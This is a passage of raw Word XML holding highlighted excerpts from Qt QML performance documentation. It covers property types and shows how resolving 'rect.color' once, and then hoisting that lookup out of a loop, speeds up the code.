      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should be inexpensive</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>other list types involve an expensive conversion cost (creating a new JavaScript Array, and adding new types one by one, with per-type conversion from C++ type instance to JavaScript value).</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D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Converting between some basic property types (such as "string" and "url" properties) can also be expensive. Using the closest matching property type will avoid unnecessary conversion.</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D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you must expose a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId621" w:anchor="QVariantMap-typedef" w:history="1">
        <w:r w:rsidRPr="00D91AD1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QVariantMap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to QML, use a "var" property rather than a "variant" property.</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In general, "property var" should be considered to be superior to "property variant" for every use-case from</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId622" w:history="1">
        <w:r w:rsidRPr="005D1E34">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2.0 and newer (note that "property variant" is marked as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>obsolete</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">), as it allows a true JavaScript reference to be stored (which can </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reduce the number of conversions</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> required in certain expressions).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00E458AC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="883" w:name="resolving-properties"/>
      <w:bookmarkStart w:id="884" w:name="_Toc483000717"/>
      <w:bookmarkStart w:id="885" w:name="_Toc483003734"/>
      <w:bookmarkStart w:id="886" w:name="_Toc483604069"/>
      <w:bookmarkStart w:id="887" w:name="_Toc483605289"/>
      <w:bookmarkEnd w:id="883"/>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Resolving Properties</w:t>
      </w:r>
      <w:bookmarkEnd w:id="884"/>
      <w:bookmarkEnd w:id="885"/>
      <w:bookmarkEnd w:id="886"/>
      <w:bookmarkEnd w:id="887"/>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D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Property resolution takes time</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. While in some cases the result of a lookup can be cached and reused, it is always best </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to avoid doing unnecessary work altogether, if possible</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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In the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, we have a block of code which is run often (in this case, it is the contents of an explicit loop; but it could be a commonly-evaluated binding expression, for example) and in it, we resolve the object with the "rect" id and its "color" property multiple times:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// bad.qml</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QtQuick</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2.3</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Item</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400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anchors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fill</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parent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color</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"blue"</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> printValue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which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value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which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 = "</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value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Component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onCompleted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t0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for</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i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i </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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1000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i</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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>printValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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rect</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color</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r</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printValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</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rect</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color</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g</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printValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</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rect</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color</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b</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printValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"alpha"</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rect</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color</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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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t1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"Took: "</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 milliseconds for 1000 iterations"</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We could instead </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>resolve the common base</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> just once in the block:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// good.qml</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QtQuick</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2.3</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Item</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400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anchors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fill</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parent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color</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"blue"</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lastRenderedPageBreak/>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function</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> printValue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which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value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which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 = "</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value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Component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onCompleted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t0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for</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i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i </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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1000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i</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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rectColor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rect</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color</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w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// resolve the common base.</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printValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"red"</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rectColor</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r</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printValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"green"</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rectColor</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g</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printValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"blue"</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rectColor</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b</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printValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"alpha"</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rectColor</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a</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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t1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"Took: "</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 milliseconds for 1000 iterations"</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Just this simple change results in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>significant performance improvement</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Note that the code above can be improved even further (since the property being looked up never changes during the loop processing), by </w:t>
      </w:r>
      <w:r w:rsidRPr="00D91AD1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hoisting the property resolution out of the loop</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as follows:</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// better.qml</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QtQuick</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2.3</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Item</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400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anchors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fill</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parent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color</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"blue"</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function</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> printValue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which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value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which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 = "</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value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Component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onCompleted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t0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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rectColor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rect</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color</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w:t>
      </w:r>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// resolve the common base outside the tight loop.</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for</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i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i </w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;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1000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i</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printValue</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"red"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rectColor</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r</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printValue</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"green"</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rectColor</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g</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printValue</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"blue"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rectColor</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b</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printValue</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"alpha"</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rectColor</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a</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t1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"Took: "</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 milliseconds for 1000 iterations"</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lastRenderedPageBreak/>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E458AC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="888" w:name="property-bindings"/>
      <w:bookmarkStart w:id="889" w:name="_Toc483000718"/>
      <w:bookmarkStart w:id="890" w:name="_Toc483003735"/>
      <w:bookmarkStart w:id="891" w:name="_Toc483604070"/>
      <w:bookmarkStart w:id="892" w:name="_Toc483605290"/>
      <w:bookmarkEnd w:id="888"/>
      <w:r w:rsidRPr="00E458AC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property Bindings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="889"/>
      <w:bookmarkEnd w:id="890"/>
